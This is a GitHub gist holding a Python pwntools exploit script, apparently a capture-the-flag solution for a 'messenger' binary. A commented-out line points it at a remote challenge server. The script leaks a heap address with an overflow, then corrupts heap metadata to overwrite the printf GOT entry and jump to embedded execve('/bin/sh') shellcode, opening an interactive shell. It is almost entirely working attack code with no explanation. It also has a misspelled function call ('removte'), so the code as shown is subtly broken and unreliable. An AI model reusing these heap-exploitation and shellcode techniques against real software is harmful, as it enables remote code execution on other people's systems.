Skip to content

Instantly share code, notes, and snippets.

@crixpwn

crixpwn/messnger.py

Created February 15, 2017 06:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save crixpwn/16dd13f42aabcf9122f74c535495ec31 to your computer and use it in GitHub Desktop.
Save crixpwn/16dd13f42aabcf9122f74c535495ec31 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
messnger.py
from pwn import *
from hexdump import *
import time
p = process("./messenger")
#p = remote("110.10.212.137", 3334)
def leave(size, data):
p.sendline("L")
time.sleep(0.1)
p.sendline(size)
time.sleep(0.1)
p.sendline(data)
p.recvuntil(">> ")
def view(idx):
p.sendline("V")
time.sleep(0.1)
p.sendline(idx)
p.recvuntil("index : ")
def change(idx, data):
p.sendline("C")
time.sleep(0.1)
p.sendline(idx)
p.sendline(str(len(data) + 1))
time.sleep(0.1)
p.sendline(data)
p.recvuntil(">> ")
def remove(idx):
p.sendline("R")
time.sleep(0.1)
p.sendline(idx)
p.recvuntil(">> ", timeout=0.1)
def heap_leak():
payload = "A" * 55
change("0", payload)
view("0")
p.recvuntil("A" * 55)
p.recv(1)
heap_base = u32(p.recv(3) + "\x00")
heap_base = heap_base & ~0xff
log.info("heap_base: " + hex(heap_base))
p.recvuntil(">> ")
return heap_base
def pwn(heap_base):
bss = 0x6020C0
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
printf = 0x602028
payload = "\x90" * 32
payload += "\x00" * 16
payload += p64(0x49)
payload += p64(printf - 0x10)
payload += p64(heap_base + 0x80)
payload += p64(0)
payload += "\xeb\x16\x00\x00\x00\x00"
payload += "\x90" * 100
payload += shellcode
change("0", payload)
removte("1")
p.interactive()
def main():
p.recvuntil(">> ")
leave("32", "A" * 31)
leave("32", "B" * 31)
heap_base = heap_leak()
pwn(heap_base)
if __name__=="__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment